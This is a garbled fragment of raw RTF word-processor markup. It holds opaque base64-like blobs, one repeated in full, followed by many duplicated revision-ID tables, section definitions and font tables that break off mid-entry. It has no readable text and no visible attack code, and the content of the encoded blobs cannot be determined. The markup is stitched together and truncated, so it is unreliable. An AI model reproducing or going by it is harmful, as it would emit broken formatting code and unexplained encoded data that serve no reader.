\\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 n s}{ 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 {\\*\\cs17 \\additive \\spriority0 \\styrsid4986254 css;}{\\*\\cs18 \\additive \\rtlch\\fcs1 \\af0 \\ltrch\\fcs0 l\\cf17 \\sbasedon10 \\sunhideused \\styrsid4986254 Hyperlink;}}{\\*\\rsidtbl \\rsid1847526\\rsid2183709\\rsid4986254\\rsid5312551\\rsid5783536\\rsid7935111 {\\*\\latentstyles\\lsdstimax267\\lsdlockeddef0\\lsdsemihiddendef1\\lsdunhideuseddef1\\lsdqformatdef0\\lsdprioritydef99{\\lsdlockedexcept \\lsdsemihidden0 \\lsdunhideused0 \\lsdqformat1 \\lsdpriority0 \\lsdlocked0 Normal; {\\*\\rsidtbl \\rsid1060393\\rsid1116386\\rsid1585482\\rsid1847526\\rsid2183709\\rsid5122917\\rsid5783536\\rsid8002206\\rsid8664178\\rsid14237745\\rsid14432744\\rsid14957115}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1 {\\*\\rsidtbl \\rsid1199835\\rsid1847526\\rsid2183709\\rsid5180496\\rsid10775863\\rsid11827162\\rsid12867363\\rsid14237745\\rsid14432744}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl \\rsid1847526\\rsid2052277\\rsid2183709\\rsid3094406\\rsid3241513\\rsid3475210\\rsid4617418\\rsid14237745\\rsid14315351\\rsid14432744}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0 {\\*\\rsidtbl \\rsid1847526\\rsid2183709\\rsid3110250\\rsid6447444\\rsid13779469\\rsid14237745\\rsid14432744\\rsid15532574\\rsid15803123}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl \\rsid1847526\\rsid2183709\\rsid4400686\\rsid7362391\\rsid8666578\\rsid10424774\\rsid12063738\\rsid14237745\\rsid14432744}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl \\rsid1847526\\rsid2183709\\rsid4928855\\rsid6827409\\rsid13056521\\rsid14237745\\rsid14432744\\rsid15803123\\rsid16268367}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl \\rsid1847526\\rsid2183709\\rsid5593755\\rsid6228682\\rsid11282901\\rsid11698073\\rsid14178431\\rsid14237745\\rsid14432744}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl \\rsid335535\\rsid1847526\\rsid2183709\\rsid7240468\\rsid8458214\\rsid11828659\\rsid12743656\\rsid14237745\\rsid14432744}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl \\rsid420751\\rsid1847526\\rsid2183709\\rsid4476117\\rsid14178431\\rsid14237745\\rsid14432744\\rsid14574943\\rsid15614891}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl \\rsid4763\\rsid1847526\\rsid2183709\\rsid8528114\\rsid11406400\\rsid12997017\\rsid14237745\\rsid14432744\\rsid15803869}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid11406400\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid11828659\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid12867363\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid1585482\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid1838094\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid3094406\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid3689921\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid4400686\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid4476117\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid6228682\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid6447444\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid6827409\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\\paperw12240\\paperh15840\\margl1034\\margr1034\\margt1701\\margb1440\\gutter0\\ltrsect {\\colortbl;\\red0\\green0\\blue0;\\red0\\green0\\blue255;\\red0\\green255\\blue255;\\red0\\green255\\blue0;\\red255\\green0\\blue255;\\red255\\green0\\blue0;\\red255\\green255\\blue0;\\red255\\green255\\blue255;\\red0\\green0\\blue128;\\red0\\green128\\blue128;\\red0\\green128\\blue0; {\\f1001\\fbidi \\fmodern\\fcharset204\\fprq1 @MS Mincho Cyr;}{\\f1003\\fbidi \\fmodern\\fcharset161\\fprq1 @MS Mincho Greek;}{\\f1004\\fbidi \\fmodern\\fcharset162\\fprq1 @MS Mincho Tur;}{\\f1007\\fbidi \\fmodern\\fcharset186\\fprq1 @MS Mincho Baltic;} {\\f1073\\fbidi \\fmodern\\fcharset161\\fprq1 GulimChe Greek;}{\\f1074\\fbidi \\fmodern\\fcharset162\\fprq1 GulimChe Tur;}{\\f1077\\fbidi \\fmodern\\fcharset186\\fprq1 GulimChe Baltic;}{\\f1082\\fbidi \\fmodern\\fcharset0\\fprq1 @\\'b1\\'bc\\'b8\\'b2\\'c3\\'bc Western;} {\\f1080\\fbidi \\fmodern\\fcharset238\\fprq1 @\\'b1\\'bc\\'b8\\'b2\\'c3\\'bc CE;}{\\f1081\\fbidi \\fmodern\\fcharset204\\fprq1 @\\'b1\\'bc\\'b8\\'b2\\'c3\\'bc Cyr;}{\\f1083\\fbidi \\fmodern\\fcharset161\\fprq1 @\\'b1\\'bc\\'b8\\'b2\\'c3\\'bc Greek;} {\\f1084\\fbidi \\fmodern\\fcharset162\\fprq1 @\\'b1\\'bc\\'b8\\'b2\\'c3\\'bc Tur;}{\\f1087\\fbidi \\fmodern\\fcharset186\\fprq1 @\\'b1\\'bc\\'b8\\'b2\\'c3\\'bc Baltic;}{\\f1442\\fbidi \\fswiss\\fcharset0\\fprq2 Microsoft YaHei Western;} {\\f1084\\fbidi \\fmodern\\fcharset162\\fprq1 @\\'b1\\'bc\\'b8\\'b2\\'c3\\'bc Tur;}{\\f1087\\fbidi \\fmodern\\fcharset186\\fprq1 @\\'b1\\'bc\\'b8\\'b2\\'c3\\'bc Baltic;}{\\flomajor\\f31508\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;} {\\f11\\fbidi \\fmodern\\fcharset128\\fprq1{\\*\\panose 02020609040205080304}MS Mincho{\\*\\falt ?l?r ??\\'81\\'66c};}{\\f12\\fbidi \\froman\\fcharset129\\fprq2{\\*\\panose 02030600000101010101}\\'b9\\'d9\\'c5\\'c1{\\*\\falt Batang};} {\\f12\\fbidi \\froman\\fcharset129\\fprq2{\\*\\panose 02030600000101010101}\\'b9\\'d9\\'c5\\'c1{\\*\\falt Batang};}{\\f18\\fbidi \\fmodern\\fcharset136\\fprq1{\\*\\panose 02020509000000000000}MingLiU{\\*\\falt 2OcuAe};} {\\f1440\\fbidi \\fswiss\\fcharset238\\fprq2 Microsoft YaHei CE;}{\\f1441\\fbidi \\fswiss\\fcharset204\\fprq2 Microsoft YaHei Cyr;}{\\f1443\\fbidi \\fswiss\\fcharset161\\fprq2 Microsoft YaHei Greek;}{\\f1444\\fbidi \\fswiss\\fcharset162\\fprq2 Microsoft YaHei Tur;} {\\f1452\\fbidi \\fswiss\\fcharset0\\fprq2 @Microsoft YaHei Western;}{\\f1450\\fbidi \\fswiss\\fcharset238\\fprq2 @Microsoft YaHei CE;}{\\f1451\\fbidi \\fswiss\\fcharset204\\fprq2 @Microsoft YaHei Cyr;}{\\f1453\\fbidi \\fswiss\\fcharset161\\fprq2 @Microsoft YaHei Greek;} {\\f1454\\fbidi \\fswiss\\fcharset162\\fprq2 @Microsoft YaHei Tur;}{\\flomajor\\f31508\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;}{\\flomajor\\f31509\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;} {\\f18\\fbidi \\fmodern\\fcharset136\\fprq1{\\*\\panose 02020509000000000000}MingLiU{\\*\\falt 2OcuAe};}{\\f34\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02040503050406030204}Cambria Math;} {\\f34\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02040503050406030204}Cambria Math;}{\\f36\\fbidi \\fmodern\\fcharset129\\fprq2{\\*\\panose 020b0503020000020004}\\'b8\\'bc\\'c0\\'ba \\'b0\\'ed\\'b5\\'f1;} {\\f34\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02040503050406030204}Cambria Math;}{\\f37\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02040503050406030204}Cambria;}{\\f41\\fbidi \\fmodern\\fcharset0\\fprq1{\\*\\panose 020b0609020204030204}Consolas;} {\\f34\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02040503050406030204}Cambria Math;}{\\f41\\fbidi \\fmodern\\fcharset0\\fprq1{\\*\\panose 020b0609020204030204}Consolas;}{\\f44\\fbidi \\froman\\fcharset129\\fprq2{\\*\\panose 02030600000101010101}@\\'b9\\'d9\\'c5\\'c1;} {\\f36\\fbidi \\fmodern\\fcharset129\\fprq2{\\*\\panose 020b0503020000020004}\\'b8\\'bc\\'c0\\'ba \\'b0\\'ed\\'b5\\'f1;}{\\f40\\fbidi \\fmodern\\fcharset129\\fprq2{\\*\\panose 020b0503020000020004}@\\'b8\\'bc\\'c0\\'ba \\'b0\\'ed\\'b5\\'f1;} {\\f37\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02040503050406030204}Cambria;}{\\f40\\fbidi \\fmodern\\fcharset129\\fprq2{\\*\\panose 020b0503020000020004}@\\'b8\\'bc\\'c0\\'ba \\'b0\\'ed\\'b5\\'f1;} {\\f41\\fbidi \\fmodern\\fcharset0\\fprq1{\\*\\panose 020b0609020204030204}Consolas;}{\\f44\\fbidi \\froman\\fcharset129\\fprq2{\\*\\panose 02030600000101010101}@\\'b9\\'d9\\'c5\\'c1;}{\\f45\\fbidi \\fmodern\\fcharset136\\fprq1{\\*\\panose 02020509000000000000}@MingLiU;} {\\f41\\fbidi \\fmodern\\fcharset0\\fprq1{\\*\\panose 020b0609020204030204}Consolas;}{\\flomajor\\f31500\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;} {\\f45\\fbidi \\fmodern\\fcharset136\\fprq1{\\*\\panose 02020509000000000000}@MingLiU;}{\\f53\\fbidi \\fmodern\\fcharset129\\fprq1{\\*\\panose 020b0609000101010101}\\'b1\\'bc\\'b8\\'b2\\'c3\\'bc;} {\\f46\\fbidi \\fmodern\\fcharset128\\fprq1{\\*\\panose 02020609040205080304}@MS Mincho;}{\\flomajor\\f31500\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;} {\\f53\\fbidi \\fmodern\\fcharset129\\fprq1{\\*\\panose 020b0609000101010101}\\'b1\\'bc\\'b8\\'b2\\'c3\\'bc;}{\\f54\\fbidi \\fmodern\\fcharset129\\fprq1{\\*\\panose 020b0609000101010101}@\\'b1\\'bc\\'b8\\'b2\\'c3\\'bc;} {\\f541\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;}{\\f543\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\f544\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\f545\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);} {\\f543\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\f544\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\f545\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);}{\\f546\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);} {\\f546\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\f547\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\f548\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}{\\f880\\fbidi \\froman\\fcharset238\\fprq2 Cambria Math CE;} {\\f547\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\f548\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}{\\f550\\fbidi \\fswiss\\fcharset238\\fprq2 Arial CE;}{\\f551\\fbidi \\fswiss\\fcharset204\\fprq2 Arial Cyr;} {\\f547\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\f548\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}{\\f560\\fbidi \\fmodern\\fcharset238\\fprq1 Courier New CE;}{\\f561\\fbidi \\fmodern\\fcharset204\\fprq1 Courier New Cyr;} {\\f54\\fbidi \\fmodern\\fcharset129\\fprq1{\\*\\panose 020b0609000101010101}@\\'b1\\'bc\\'b8\\'b2\\'c3\\'bc;}{\\f90\\fbidi \\fswiss\\fcharset134\\fprq2{\\*\\panose 020b0503020204020204}Microsoft YaHei;} {\\f553\\fbidi \\fswiss\\fcharset161\\fprq2 Arial Greek;}{\\f554\\fbidi \\fswiss\\fcharset162\\fprq2 Arial Tur;}{\\f555\\fbidi \\fswiss\\fcharset177\\fprq2 Arial (Hebrew);}{\\f556\\fbidi \\fswiss\\fcharset178\\fprq2 Arial (Arabic);} {\\f557\\fbidi \\fswiss\\fcharset186\\fprq2 Arial Baltic;}{\\f558\\fbidi \\fswiss\\fcharset163\\fprq2 Arial (Vietnamese);}{\\f652\\fbidi \\fmodern\\fcharset0\\fprq1 MS Mincho Western{\\*\\falt ?l?r ??\\'81\\'66c};} {\\f557\\fbidi \\fswiss\\fcharset186\\fprq2 Arial Baltic;}{\\f558\\fbidi \\fswiss\\fcharset163\\fprq2 Arial (Vietnamese);}{\\f662\\fbidi \\froman\\fcharset0\\fprq2 Batang Western{\\*\\falt Batang};}{\\f660\\fbidi \\froman\\fcharset238\\fprq2 Batang CE{\\*\\falt Batang};} {\\f563\\fbidi \\fmodern\\fcharset161\\fprq1 Courier New Greek;}{\\f564\\fbidi \\fmodern\\fcharset162\\fprq1 Courier New Tur;}{\\f565\\fbidi \\fmodern\\fcharset177\\fprq1 Courier New (Hebrew);}{\\f566\\fbidi \\fmodern\\fcharset178\\fprq1 Courier New (Arabic);} {\\f567\\fbidi \\fmodern\\fcharset186\\fprq1 Courier New Baltic;}{\\f568\\fbidi \\fmodern\\fcharset163\\fprq1 Courier New (Vietnamese);}{\\f880\\fbidi \\froman\\fcharset238\\fprq2 Cambria Math CE;}{\\f881\\fbidi \\froman\\fcharset204\\fprq2 Cambria Math Cyr;} {\\f650\\fbidi \\fmodern\\fcharset238\\fprq1 MS Mincho CE{\\*\\falt ?l?r ??\\'81\\'66c};}{\\f651\\fbidi \\fmodern\\fcharset204\\fprq1 MS Mincho Cyr{\\*\\falt ?l?r ??\\'81\\'66c};}{\\f653\\fbidi \\fmodern\\fcharset161\\fprq1 MS Mincho Greek{\\*\\falt ?l?r ??\\'81\\'66c};} {\\f654\\fbidi \\fmodern\\fcharset162\\fprq1 MS Mincho Tur{\\*\\falt ?l?r ??\\'81\\'66c};}{\\f657\\fbidi \\fmodern\\fcharset186\\fprq1 MS Mincho Baltic{\\*\\falt ?l?r ??\\'81\\'66c};}{\\f662\\fbidi \\froman\\fcharset0\\fprq2 Batang Western{\\*\\falt Batang};} {\\f660\\fbidi \\froman\\fcharset238\\fprq2 Batang CE{\\*\\falt Batang};}{\\f661\\fbidi \\froman\\fcharset204\\fprq2 Batang Cyr{\\*\\falt Batang};}{\\f663\\fbidi \\froman\\fcharset161\\fprq2 Batang Greek{\\*\\falt Batang};} {\\f661\\fbidi \\froman\\fcharset204\\fprq2 Batang Cyr{\\*\\falt Batang};}{\\f663\\fbidi \\froman\\fcharset161\\fprq2 Batang Greek{\\*\\falt Batang};}{\\f664\\fbidi \\froman\\fcharset162\\fprq2 Batang Tur{\\*\\falt Batang};} {\\f664\\fbidi \\froman\\fcharset162\\fprq2 Batang Tur{\\*\\falt Batang};}{\\f667\\fbidi \\froman\\fcharset186\\fprq2 Batang Baltic{\\*\\falt Batang};}{\\f722\\fbidi \\fmodern\\fcharset0\\fprq1 MingLiU Western{\\*\\falt 2OcuAe};} {\\f667\\fbidi \\froman\\fcharset186\\fprq2 Batang Baltic{\\*\\falt Batang};}{\\f722\\fbidi \\fmodern\\fcharset0\\fprq1 MingLiU Western{\\*\\falt 2OcuAe};}{\\f880\\fbidi \\froman\\fcharset238\\fprq2 Cambria Math CE;}{\\f881\\fbidi \\froman\\fcharset204\\fprq2 Cambria Math Cyr;} {\\f880\\fbidi \\froman\\fcharset238\\fprq2 Cambria Math CE;}{\\f881\\fbidi \\froman\\fcharset204\\fprq2 Cambria Math Cyr;}{\\f883\\fbidi \\froman\\fcharset161\\fprq2 Cambria Math Greek;}{\\f884\\fbidi \\froman\\fcharset162\\fprq2 Cambria Math Tur;} {\\f881\\fbidi \\froman\\fcharset204\\fprq2 Cambria Math Cyr;}{\\f883\\fbidi \\froman\\fcharset161\\fprq2 Cambria Math Greek;}{\\f884\\fbidi \\froman\\fcharset162\\fprq2 Cambria Math Tur;}{\\f887\\fbidi \\froman\\fcharset186\\fprq2 Cambria Math Baltic;} {\\f883\\fbidi \\froman\\fcharset161\\fprq2 Cambria Math Greek;}{\\f884\\fbidi \\froman\\fcharset162\\fprq2 Cambria Math Tur;}{\\f887\\fbidi \\froman\\fcharset186\\fprq2 Cambria Math Baltic;}{\\f888\\fbidi \\froman\\fcharset163\\fprq2 Cambria Math (Vietnamese);} {\\f887\\fbidi \\froman\\fcharset186\\fprq2 Cambria Math Baltic;}{\\f888\\fbidi \\froman\\fcharset163\\fprq2 Cambria Math (Vietnamese);}{\\f902\\fbidi \\fmodern\\fcharset0\\fprq2 Malgun Gothic Western;} {\\f888\\fbidi \\froman\\fcharset163\\fprq2 Cambria Math (Vietnamese);}{\\f910\\fbidi \\froman\\fcharset238\\fprq2 Cambria CE;}{\\f911\\fbidi \\froman\\fcharset204\\fprq2 Cambria Cyr;}{\\f913\\fbidi \\froman\\fcharset161\\fprq2 Cambria Greek;} {\\f902\\fbidi \\fmodern\\fcharset0\\fprq2 Malgun Gothic Western;}{\\f910\\fbidi \\froman\\fcharset238\\fprq2 Cambria CE;}{\\f911\\fbidi \\froman\\fcharset204\\fprq2 Cambria Cyr;}{\\f913\\fbidi \\froman\\fcharset161\\fprq2 Cambria Greek;} {\\f914\\fbidi \\froman\\fcharset162\\fprq2 Cambria Tur;}{\\f917\\fbidi \\froman\\fcharset186\\fprq2 Cambria Baltic;}{\\f918\\fbidi \\froman\\fcharset163\\fprq2 Cambria (Vietnamese);}{\\f942\\fbidi \\fmodern\\fcharset0\\fprq2 @\\'b8\\'bc\\'c0\\'ba \\'b0\\'ed\\'b5\\'f1 Western;} {\\f914\\fbidi \\froman\\fcharset162\\fprq2 Cambria Tur;}{\\f917\\fbidi \\froman\\fcharset186\\fprq2 Cambria Baltic;}{\\f918\\fbidi \\froman\\fcharset163\\fprq2 Cambria (Vietnamese);}{\\f950\\fbidi \\fmodern\\fcharset238\\fprq1 Consolas CE;} {\\f91\\fbidi \\fswiss\\fcharset134\\fprq2{\\*\\panose 020b0503020204020204}@Microsoft YaHei;}{\\flomajor\\f31500\\fbidi \\froman\\fcharset0\\fprq2{\\*\\panose 02020603050405020304}Times New Roman;} {\\f942\\fbidi \\fmodern\\fcharset0\\fprq2 